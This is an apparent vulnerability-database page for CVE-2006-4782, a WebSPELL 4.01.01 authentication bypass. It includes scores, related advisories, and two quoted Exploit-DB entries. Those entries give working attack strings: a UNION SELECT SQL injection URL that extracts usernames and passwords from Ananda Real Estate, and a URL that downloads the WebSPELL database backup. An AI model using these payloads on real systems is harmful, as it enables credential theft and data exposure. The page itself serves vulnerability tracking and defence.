CVE-2006-4782
published 2006-09-14CVE-2006-4782: src/index.php in WebSPELL 4.01.01 and earlier, when register_globals is enabled, allows remote attackers to bypass authentication and gain sensitive…
PriorityP335medium5.4CVSS 2.0
AVNACHAuNCCINAN
EXPLOIT
EPSS
3.17%
86.4th percentile
src/index.php in WebSPELL 4.01.01 and earlier, when register_globals is enabled, allows remote attackers to bypass authentication and gain sensitive information stored in the database via a modified userID parameter in a write action to admin/database.php.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webspell | webspell | <= 4.01.01 | — |
| webspell | webspell | — | — |
| webspell | webspell | — | — |
| webspell | webspell | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9rc5-cwv6-75xr: SQL injection vulnerability in webSPELL allows remote attackers to execute arbitrary SQL commands via a ws_auth cookie, a different vulnerability than
ghsa_unreviewed·2022-05-01·CVSS 5.4
CVE-2007-1154 [MEDIUM] CWE-89 GHSA-9rc5-cwv6-75xr: SQL injection vulnerability in webSPELL allows remote attackers to execute arbitrary SQL commands via a ws_auth cookie, a different vulnerability than
SQL injection vulnerability in webSPELL allows remote attackers to execute arbitrary SQL commands via a ws_auth cookie, a different vulnerability than CVE-2006-4782.
GHSA
GHSA-ph8m-vpmc-9w87: src/index
ghsa_unreviewed·2022-05-01
CVE-2006-4782 [MEDIUM] GHSA-ph8m-vpmc-9w87: src/index
src/index.php in WebSPELL 4.01.01 and earlier, when register_globals is enabled, allows remote attackers to bypass authentication and gain sensitive information stored in the database via a modified userID parameter in a write action to admin/database.php.
GHSA
GHSA-97p9-9xph-wfxf: webSPELL 4
ghsa_unreviewed·2022-05-01·CVSS 5.4
CVE-2007-1160 [MEDIUM] CWE-287 GHSA-97p9-9xph-wfxf: webSPELL 4
webSPELL 4.0, and possibly later versions, allows remote attackers to bypass authentication via a ws_auth cookie, a different vulnerability than CVE-2006-4782.
No detection rules found.
Exploit-DB
Ananda Real Estate 3.4 - 'agent' SQL Injection
exploitdb·2006-12-24
CVE-2010-4782 Ananda Real Estate 3.4 - 'agent' SQL Injection
Ananda Real Estate 3.4 - 'agent' SQL Injection
---
# Title : Ananda Real Estate <= 3.4 (agent) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.enthrallweb.us
# $$ : 179.40 USD
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//list.asp?agent=[SQL]
Example:
//list.asp?agent=-1%20union%20select%20username,0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user%20where%20id%20like%201
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-24]
Exploit-DB
webSPELL 4.01.01 - Database Backup Download
exploitdb·2006-09-12
CVE-2006-4782 webSPELL 4.01.01 - Database Backup Download
webSPELL 4.01.01 - Database Backup Download
---
# WebSPELL <= 4.01.01 Accessible Database Backup Download Exploit
# Discovered by: Trex
# Visit: www.SecuritySector.org / www.UnderGround.ag
# Exploit:
http://[SITE]/[PATH]/admin/database.php?action=write&userID=1
# Solution:
http://cms.webspell.org/index.php?site=files&file=15
# milw0rm.com [2006-09-12]
No writeups or analysis indexed.
http://cms.webspell.org/index.php?site=files&file=15http://secunia.com/advisories/21881http://www.securityfocus.com/bid/19975http://www.vupen.com/english/advisories/2006/3572https://exchange.xforce.ibmcloud.com/vulnerabilities/28896https://www.exploit-db.com/exploits/2352http://cms.webspell.org/index.php?site=files&file=15http://secunia.com/advisories/21881http://www.securityfocus.com/bid/19975http://www.vupen.com/english/advisories/2006/3572https://exchange.xforce.ibmcloud.com/vulnerabilities/28896https://www.exploit-db.com/exploits/2352
2006-09-14
Published